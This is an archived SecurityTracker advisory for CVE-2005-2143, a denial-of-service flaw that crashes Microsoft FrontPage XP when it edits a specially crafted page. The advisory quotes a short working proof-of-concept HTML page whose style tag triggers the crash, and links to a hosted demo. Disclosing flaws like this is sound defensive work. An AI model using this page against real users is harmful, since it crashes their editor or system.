SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Microsoft FrontPage Vendors:   Microsoft
Microsoft Front Page May Crash When Editing a Specially Crafted Web Page
SecurityTracker Alert ID:  1014352
SecurityTracker URL:  http://securitytracker.com/id/1014352
CVE Reference:   CVE-2005-2143   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 1 2005
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): XP (possibly 2002)
Description:   JAAS reported a vulnerability in Microsoft Front Page. A remote user can create HTML that, when edited by the target user, will cause the target user's application to crash.

A remote user can create a web page containing a specially crafted style tag. When the web page is edited by the target user with Front Page, the target user's application or potentially the target user's system may crash.

A demonstration exploit is available at:

http://www.freewebs.com/xxosfilexx/HungFPage.html

Impact:   A remote user can create HTML that, when edited by the target user, will cause the target user's Front Page application or potentially the target user's system to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  noEtFpage



Hello Security world
/
test on: WinXP SP2
FrontPage XP
/
when you edit this page with FrontPage XP
will you see FrontPage is hung & restart computer
to try:
http://www.freewebs.com/xxosfilexx/HungFPage.html
/
/Code:
/
 
 
<html>
<!--
////////////////////////////////////////
Do you want avoidance of attack ?!! OK..Don't edit this page with FrontPage XP !!
/
/
wrote by: JAAS
jaas1001@hotmail.com
////////////////////////////////////////
/
Error:
loop don't  stopped (
FPEDITAX.DLL => MSVCRT.dll => realloc();
336DE339   CALL DWORD PTR DS:[<&MSVCRT.realloc>]    ; MSVCRT.realloc
)
/
-->
<head>
<TITLE>a</TITLE>
<style>#gb{}#gb .tx{float:left}#gb .g{}</style>
</head>
<body  dir=rtl>
       <div id=gb><span class=g>xxx<span class=tx>xxx</span></span></div>      
    </body>
</html>

FREE pop-up blocking with the new MSN Toolbar MSN Toolbar Get it now!
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC